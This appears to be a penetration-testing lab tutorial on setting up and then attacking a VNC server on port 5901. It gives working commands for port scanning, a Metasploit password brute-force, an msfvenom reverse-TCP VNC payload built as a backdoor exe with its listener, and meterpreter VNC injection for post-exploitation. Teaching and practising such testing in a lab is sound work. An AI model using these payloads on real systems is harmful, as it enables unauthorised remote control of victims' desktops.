VNC Penetration Testing (Port 5901)
Welcome to Internal penetration testing on VNC server where you will learn VNC installation and configuration, enumeration and attack, system security and precaution.
Table of Content
- Introduction to VNC
- Lab Set-Up Requirement
- VNC Installation
- Connect Window PC to VNC server
- TCP Port Scanning
- VNC Banner Grabbing
- Password Attack
- Access VNC with Kali Linux
- Exploit VNC using Msfvenom
- VNC Post Exploitation
- Shift Default Port to Another
Introduction to VNC
Virtual Network Computing (VNC) is a graphical desktop sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse events from one computer to another, relaying the graphical screen updates back in the other direction. It uses port 5900: VNC and 5901: VNC-1.
Penetration Lab Requirements
VNC Server: ubuntu
Attacker system: Kali Linux
Client system: window (tight VNC view)
Open the terminal and follow the given below steps by executing a given command for VNC installation.
Given below command will install the desktop, Unity, as well as several packages that are required for the graphical interface to work properly.
sudo apt-get install gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal
Now type the following command for VNC server installation.
sudo apt-get install vnc4server
Given below command will reset your server password that is required for VNC login
The password should be a minimum 6 digits; I have set server password: 098765 for VNC authentication.
Type the given below command to run VNC
sudo vncserver :1
It is required to kill the process if you want to make some changes in running VNC server.
sudo vncserver -kill :1
Now type the following command in order to open VNC startup file for making some changes.
sudo gedit ~/.vnc/xstartup
Add given below line in startup file as shown in given and save the changes.
exec gnome-session & exec gnome-panel & exec gnome-settings-daemon & exec metacity &
Execute given below command to set the resolution of the Desktop screen.
sudo vncserver :1 -geometry 1024x768 -depth 24
After following above 7 steps check service status of VNC server using given below command.
sudo netstat -tnl |grep 5901
From the given image you can confirm that port 5901 is activated
Connect Window PC to VNC server
TightVNC is a free remote control software package that helps the client to connect with VNC server. I have downloaded it in the client machine so that he can connect to the vnc server.
Run TightVNC Viewer and enter [192.168.1.218:5901] server IP: port number as shown in the given image and then click on connect.
The client will get VNC authentication Pop up enter the server password which you have set above.
From the given image you can observe that window client is connected to ubuntu server and we have accessed his Desktop you can control it using mouse and keyboard.
TCP Port Scanning
Scanning plays an important role in penetration testing because through scanning attacker make sure which services and open ports are available for enumeration and attack.
Here we are using nmap for scanning port and protocols.
nmap -sT 192.168.1.218
If service is activated in the targeted server then nmap shows open STATE for port 5901.
VNC Banner Grabbing
Following nmap command will Queries a VNC server for its protocol version and supported security types.
nmap -p 5901 --script vnc-info 192.168.1.218
From given below image you can conclude that it has shown protocol version 3.8 and security type: VNC authentication 2.
This module will test a VNC server on a range of machines and report successful logins. Currently, it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge-response authentication method.
use auxiliary/scanner/vnc/vnc_login msf auxiliary(vnc_login) >set rhosts 192.168.1.218 msf auxiliary(vnc_login) >set rport 5901 msf auxiliary(vnc_login) >set pass_file /root/Desktop/pass.txt msf auxiliary(vnc_login) > run
Awesome!! From given below image you can observe the same password: 098765 found by Metasploit.
Access VNC with Kali Linux
Open a new terminal and type following command for connecting with VNC server using above password 098765
Nice!! You can see after making successfully brute force attack, an attacker can easily connect with vnc server.
Exploit VNC using Msfvenom
Create a VNC payload using msfvenom and try to achieve a VNC shell of a victim’s PC.
Open the terminal in your Kali Linux and type following command to generate a VNC payload using the msfvenom command.
msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.1.216 lport=4455 -f exe > /var/www/html/vnc.exe
Now the above command will generate an exe file for the VNC payload in /var/www/html of Kali Linux.
Being an attack you need to send this backdoor to the target and start multi handler in the Metasploit framework.
use exploit/multi/handler msf exploit(handler) > set payload windows/vncinject/reverse_tcp msf exploit(handler) > set lhost 192.168.1.216 msf exploit(handler) > set lport 4455 msf exploit(handler) > set viewonly false msf exploit(handler) > run
Now attacker tries to connect with the target using VNC payload, from given screenshot you can see it has launched vncviewer and we have our session 1 is running at background.
Here you can see the desktop screen of victim’s pc through will attacker is connected.
VNC Post Exploitation
Suppose you have already exploited any window system and got victim’s system reverse connection through the meterpreter session.
Type the given below command which will inject a VNC DLL via a reflective loader (staged). Connect back to the attacker.
meterpreter > run vnc
Great!! Again the attacker is connected to a victim’s system.
Shift Default Port to Another
Open vnserver setup files using given below command:
sudo gedit /usr/bin/vncserver
Follow given below step for making changes
Add # to comment “vncport = 5900”
Add a new line as shown in given image for forwarding VNC service as vncPort = 8800;
Now try to connect with vnc server through port 8800 as connected above through TightVNC viewer and enter the password.
Hence you can see the vnc connection has been established successfully.
Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher Contact Here